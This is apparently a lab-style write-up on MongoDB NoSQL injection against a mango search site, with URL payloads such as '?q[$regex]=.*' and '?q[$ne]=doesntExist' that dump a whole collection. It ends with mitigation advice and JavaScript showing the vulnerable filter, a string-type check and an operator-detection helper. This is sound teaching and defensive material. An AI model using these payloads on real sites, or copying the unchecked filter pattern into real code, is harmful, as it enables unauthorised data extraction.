In traditional SQL databases, in-band data extraction vulnerabilities can often lead to the entire database being exfiltrated. In MongoDB, however, since it is a non-relational database and queries are performed on specific collections, attacks are (usually) limited to the collection the injection applies to.
The website is a basic search application where you can find facts about various types of mangoes.
The search form sends a GET request where the search query is passed as ?q=<search term>. On the server side, the request likely queries the database like this:
```javascript
db.types.find({
  name: $_GET['q']
});
```

Use a RegEx query that matches everything:

```javascript
db.types.find({
  name: {$regex: /.*/}
});
```

URL-encoded payload:

```
?q[$regex]=.*
```
$ne (not equal):

```javascript
db.types.find({
  name: {$ne: 'doesntExist'}
});
```

URL-encoded: `?q[$ne]=doesntExist`

$gt (greater than):

```javascript
db.types.find({
  name: {$gt: ''}
});
```

URL-encoded: `?q[$gt]=`

$gte (greater than or equal):

```javascript
db.types.find({
  name: {$gte: ''}
});
```

URL-encoded: `?q[$gte]=`

$lt (less than):

```javascript
db.types.find({
  name: {$lt: '~'}
});
```

URL-encoded: `?q[$lt]=~`

$lte (less than or equal):

```javascript
db.types.find({
  name: {$lte: '~'}
});
```

URL-encoded: `?q[$lte]=~`
- In-band extraction is limited to the specific collection being queried
- Use `$regex: /.*/` to match all documents in the collection
- Alternative operators like `$ne`, `$gt`, `$gte`, `$lt`, `$lte` can achieve similar results
- Always URL-encode special characters in payloads
- The `~` character works well with `$lt`/`$lte` as it's the largest printable ASCII value
- Validate and sanitize user input before passing to MongoDB queries
- Use parameterized queries or input validation
- Implement proper access controls to limit data exposure
- Consider using MongoDB's built-in security features
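As an added example (not code from the original write-up), the following shows why `?q[$regex]=.*` turns into an operator object on the server, and how the input-validation advice above stops it: `parseQuery` is a hypothetical, minimal imitation of PHP/qs bracket parsing, `buildFilterVulnerable` reproduces the unchecked query construction, and `buildFilterSafe` plus `containsOperator` are the string-type check and detection helper a defender would add.

```javascript
// Hypothetical minimal imitation of how PHP / Express-qs parse "name[sub]=value"
// query strings into nested objects. This is what makes ?q[$regex]=.* arrive
// server-side as { q: { $regex: '.*' } } rather than as a plain string.
function parseQuery(qs) {
  const out = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawVal = ''] = pair.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/); // matches name[sub]
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Vulnerable pattern from the write-up: whatever the parser produced is
// dropped straight into the filter, so an object becomes a query operator.
function buildFilterVulnerable(q) {
  return { name: q };
}

// Hardened: only a plain string is accepted as a search term. Any object
// (which is the only way $regex, $ne, $gt, ... can be smuggled in) is rejected.
function buildFilterSafe(q) {
  if (typeof q !== 'string') {
    throw new TypeError('search term must be a string');
  }
  return { name: q };
}

// Detection helper for logging/WAF-style checks: true when a parsed parameter
// carries a MongoDB operator key ($-prefixed) at any nesting depth.
function containsOperator(value) {
  if (value === null || typeof value !== 'object') return false;
  return Object.keys(value).some(k => k.startsWith('$') || containsOperator(value[k]));
}

// Demo on two constructed requests: a normal search and the injected one.
for (const raw of ['?q=Alphonso', '?q[$regex]=.*']) {
  const term = parseQuery(raw).q;
  console.log(raw, '->', JSON.stringify(term), 'operator:', containsOperator(term));
}
```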